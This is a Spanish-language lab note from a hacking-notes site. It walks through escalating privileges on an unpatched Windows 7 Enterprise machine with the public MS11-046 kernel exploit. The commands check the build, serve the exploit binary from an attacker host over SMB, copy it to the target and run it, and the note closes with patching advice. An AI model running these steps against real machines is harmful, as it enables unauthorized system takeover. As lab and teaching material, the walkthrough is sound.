> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/es/windows-vulnerabilities/kernel-exploitation/windows-7-enterprise-kernel-exploitation.md).

# Windows 7 Enterprise - MS11-046

Esta nota documenta un caso de laboratorio sobre un objetivo antiguo con Windows 7 Enterprise sin parches. La explotación del kernel siempre debe comenzar con una verificación precisa de la versión y los parches.

## Detección

```powershell
systeminfo
```

Versión observada:

```
VERSIÓN DEL SO: 6.1.7600 N/A Compilación 7600
```

<figure><img src="/files/859be0bf625c529300897f8cc179cfc8cd2e0de3" alt="Windows 7 Enterprise systeminfo output"><figcaption></figcaption></figure>

## Explotación MS11-046

{% embed url="<https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS11-046>" %}

<figure><img src="/files/8a782ad6b294969e769f5e6c2f8b19f487aa210d" alt="MS11-046 exploit reference"><figcaption></figcaption></figure>

<figure><img src="/files/74531b85eff973c640b76177fc94dbb8d32651f2" alt="MS11-046 exploit file"><figcaption></figcaption></figure>

## Transferir por SMB

```bash
smbserver.py share $(pwd) -smb2support
```

```powershell
copy \\10.10.14.26\share\ms11-046.exe ms11.exe
```

<figure><img src="/files/493707b5b3b5a1bccee1da6138edf2cbb5929b17" alt="MS11-046 exploit transferred over SMB"><figcaption></figcaption></figure>

## Ejecutar

```powershell
./ms11.exe
```

<figure><img src="/files/532b452ce58b434a0aae3f902cf4301a6555769f" alt="MS11-046 privileged execution result"><figcaption></figcaption></figure>

## Puntos clave

* Una compilación antigua de Windows no es suficiente; verifica las actualizaciones instaladas.
* La transferencia por SMB es conveniente en laboratorios de Windows.
* Mitiga aplicando parches o retirando los sistemas obsoletos.


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/es/windows-vulnerabilities/kernel-exploitation/windows-7-enterprise-kernel-exploitation.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
